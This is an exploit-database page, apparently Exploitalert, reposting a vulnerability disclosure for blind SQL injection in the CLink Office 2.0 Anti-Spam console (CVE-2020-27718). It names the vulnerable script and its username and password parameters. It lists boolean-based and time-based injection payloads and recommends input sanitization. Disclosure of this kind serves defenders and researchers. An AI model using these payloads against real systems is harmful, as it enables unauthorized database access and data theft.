Advertisement






CLink Office 2.0 SQL Injection

CVE Category Price Severity
CVE-2020-27718 CWE-89 $5,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-05-25
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022050085

Below is a copy:

CLink Office 2.0 SQL Injection
# Exploit Title: Multiple blind SQL injection vulnerabilities in in CLink Office 2.0 Anti-Spam management console 
# Date: 30 Mar 2022 
# Exploit Author: Erwin Chan, Stephen Tsoi 
# Vendor Homepage: https://www.communilink.net/ 
# Softwar: CLink Office 
# Version: 2.0 
# Tested on: CLink Office 2.0 Anti-Spam management console

Vulnerability details below:

Affected URL: /cgi-bin/anti-spam.pl
Affected Parameter: username, password
Payload example:
- boolean-based blind SQLi
* ' AND 1234=(SELECT (CASE WHEN (TRUE) THEN 1234 ELSE (SELECT 1111 UNION
SELECT 2222) END))-- LMgx*
*' AND 1234=(SELECT (CASE WHEN (FALSE) THEN 1234 ELSE (SELECT 1111 UNION
SELECT 2222) END))-- LMgx*
- time-based blind SQLi
*' OR SLEEP(5)-- LMgx*

As a result, we were able to dump database data on application. I recommend
development team to perform input sanitization on affected parameters.
Please lets me know if you have any questions. Thanks.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum